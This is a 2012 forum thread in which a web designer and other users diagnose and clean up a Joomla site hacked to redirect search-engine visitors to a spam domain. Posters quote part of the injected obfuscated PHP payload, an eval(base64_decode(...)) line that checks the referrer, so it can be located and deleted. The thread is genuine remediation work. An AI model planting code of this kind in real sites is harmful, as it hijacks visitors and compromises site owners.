| HELP! Possible 302 hijack for client site | designcouch | 7/6/12 7:07 AM | My client's site has been the victim of a possible 302 hijack. Searching for "Frederick Living" brings up their results (http://www.frederick-mennonite.org) but when the links are clicked, pages from the http://bee.edns.biz domain are shown. This is an unrelated s |
| Re: HELP! Possible 302 hijack for client site | kravman85 | 7/7/12 9:09 AM | I'm having the exact same problem as well. I'm going to try refreshing/flushing dns, new primary domain, then if all else fails contacting the hosting company. Remember to use best practices and I typically ban any out of country IP address. |
| Re: HELP! Possible 302 hijack for client site | webado | 7/7/12 9:28 AM | Actually it's not hijacked. The website has been hacked with a conditional hack that redirects to the other possibly malicious site. That might be done through javascript so all internal js files and on-page js code need to be check and all external |
| Re: HELP! Possible 302 hijack for client site | designcouch | 7/7/12 10:18 AM | Unless the site hack is dependent on the user arriving from a search engine, this is not the case, as navigating directly to their site doesn't result in a redirect. |
| Re: HELP! Possible 302 hijack for client site | webado | 7/7/12 10:29 AM | I said it's a conditional hack - and that it appears to be through javascript. |
| Re: HELP! Possible 302 hijack for client site | designcouch | 7/9/12 6:47 AM | Thank you for your response, webado. I'm poring over the site's javascript (on page and internal) files looking for the inserted code. The only external files are direct links to the Google code library (specifically the jQuery library). Can I consid |
| Re: HELP! Possible 302 hijack for client site | redleg-redleg | 7/9/12 6:53 AM | Check your site for some obfuscated php code, a line that starts out like this eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWhlY ........... the string of seemingly random characters will be pretty long. Start with your homepage t |
| Re: HELP! Possible 302 hijack for client site | designcouch | 7/9/12 6:58 AM | Redleg, That line of code appears to be in the index.php file of my site. Should deleting it solve the issue? |
| Re: HELP! Possible 302 hijack for client site | redleg-redleg | 7/9/12 7:19 AM | Yes, you need to remove that line. Just to be sure here is the entire line eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWhlYWRlcnNfc2VudCgpOw0KaWYgKCEkc WF6cGxtKXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVInXTsNCiR1YWc9JF9TRVJWRVJb |
| Re: HELP! Possible 302 hijack for client site | designcouch | 7/9/12 7:36 AM | Redleg, Yeah - I'd started looking into everything on the site, and it appears that most .php files are affected. It looks like I have a long day ahead of me deleting and re-saving files. In your experience, would re-installing Joomla be a viable sol |
| Re: HELP! Possible 302 hijack for client site | redleg-redleg | 7/9/12 7:42 AM | If you have a lot of individual files to clean up then it would probably end up being faster in the long run to re-install Joomla. |
| Re: HELP! Possible 302 hijack for client site | designcouch | 7/10/12 9:33 AM | Red Leg, I have re-installed Joomla AND restored the site from a backup from last year. All of the base64 code that was inserted is gone. However, search engines are still forwarding the site to the spam pages. Do you have any thoughts? Does it just |
| Re: HELP! Possible 302 hijack for client site | designcouch | 7/10/12 9:56 AM | I have also done a basic process inspection when clicking on the link from Google. This confirms that the hack is a 302 redirect, as initially suspected. I have included a screenshot of this process - note the status on the very top entry (the "frede |
| Re: HELP! Possible 302 hijack for client site | redleg-redleg | 7/10/12 11:05 AM | Unfortunately there is still something wrong, a lingering hack somewhere that did not get overwritten. There is a listing for a simple script at http://redleg-redleg.blogspot.com/p/simple-script-to-find-base64decode-in.html You copy and paste the |
| Re: HELP! Possible 302 hijack for client site | designcouch | 7/10/12 12:29 PM | Thanks Red Leg - that allowed me to locate the rest. Will update on whether or not it was successful. |
| Re: HELP! Possible 302 hijack for client site | designcouch | 7/10/12 1:34 PM | Final update - consider this issue closed. Red Leg's script helped me locate the last few files. Search results are now functioning just as they should. Thanks all! |